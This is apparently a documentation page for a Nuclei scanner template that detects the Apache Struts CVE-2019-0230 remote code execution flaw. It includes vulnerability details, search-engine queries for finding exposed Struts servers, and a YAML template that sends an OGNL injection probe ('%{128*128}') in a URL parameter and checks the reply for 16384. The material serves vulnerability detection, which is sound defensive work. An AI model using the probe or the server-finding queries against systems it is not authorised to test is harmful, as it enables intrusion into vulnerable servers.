Apache Struts <=2.5.20 - Remote Code Execution
ID: CVE-2019-0230
Severity: critical
Author: geeknik
Tags: cve,cve2019,tenable,packetstorm,struts,rce,apache
Description
Section titled “Description”Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation when evaluated on raw user input in tag attributes, which may lead to remote code execution.
YAML Source
Section titled “YAML Source”id: CVE-2019-0230
info: name: Apache Struts <=2.5.20 - Remote Code Execution author: geeknik severity: critical description: Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation when evaluated on raw user input in tag attributes, which may lead to remote code execution. impact: | Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected server. remediation: | Upgrade Apache Struts to a version higher than 2.5.20 or apply the necessary patches provided by the vendor. reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-0230 - https://cwiki.apache.org/confluence/display/WW/S2-059 - https://www.tenable.com/blog/cve-2019-0230-apache-struts-potential-remote-code-execution-vulnerability - http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html - https://cwiki.apache.org/confluence/display/ww/s2-059 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-0230 cwe-id: CWE-1321 epss-score: 0.95364 epss-percentile: 0.99359 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: struts shodan-query: - http.html:"apache struts" - http.title:"struts2 showcase" - http.html:"struts problem report" fofa-query: - body="struts problem report" - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve,cve2019,tenable,packetstorm,struts,rce,apachevariables: str: "{{rand_base(6)}}"
http: - method: GET path: - "{{BaseURL}}/?id={{str}}%25{128*128}"
matchers: - type: word part: body words: - "{{str}}16384"# digest: 4b0a00483046022100f94791050e2238f48001cc54cb182803fc094948481adc8cbd255fffbe22b4af022100a0301ccec79199594dfe74165378b11b0201d9c55c910860b83946846f9b8014:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-0230.yaml"